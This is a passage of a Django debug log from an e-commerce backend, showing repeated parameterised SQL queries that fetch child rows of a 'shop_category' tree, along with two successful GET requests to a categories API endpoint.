13:02:13,562 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:02:13,566 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:02:13,570 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:02:13,574 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:02:13,578 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:02:13,584 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:02:13,589 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:02:13,593 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:02:13,597 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:02:13,604 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:02:13,611 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:02:13,615 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:02:13,620 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:02:13,626 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:02:13,632 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:02:13,637 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:02:13,645 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:02:13,650 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:02:13,656 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:02:13,664 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:02:13,669 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:02:13] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:02:14,166 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:02:14,172 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:02:14,176 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:02:14,178 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:02:14,181 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:02:14,184 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:02:14,186 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:02:14,188 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:02:14,191 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:02:14,194 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:02:14,196 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:02:14,200 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:02:14,203 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:02:14,205 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:02:14,210 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:02:14,212 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:02:14,215 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:02:14,218 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:02:14,221 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:02:14,226 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:02:14,229 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:02:14,232 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:02:14,235 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:02:14,238 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:02:14,241 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:02:14,246 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:02:14,249 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:02:14,251 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:02:14,254 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:02:14,257 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:02:14,263 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:02:14,266 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:02:14,270 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:02:14,273 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:02:14,277 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:02:14,283 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:02:14,286 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:02:14,290 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:02:14,294 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:02:14,298 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:02:14,303 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:02:14,308 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:02:14,311 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:02:14,315 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:02:14,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:02:14,323 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:02:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:02:25,036 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 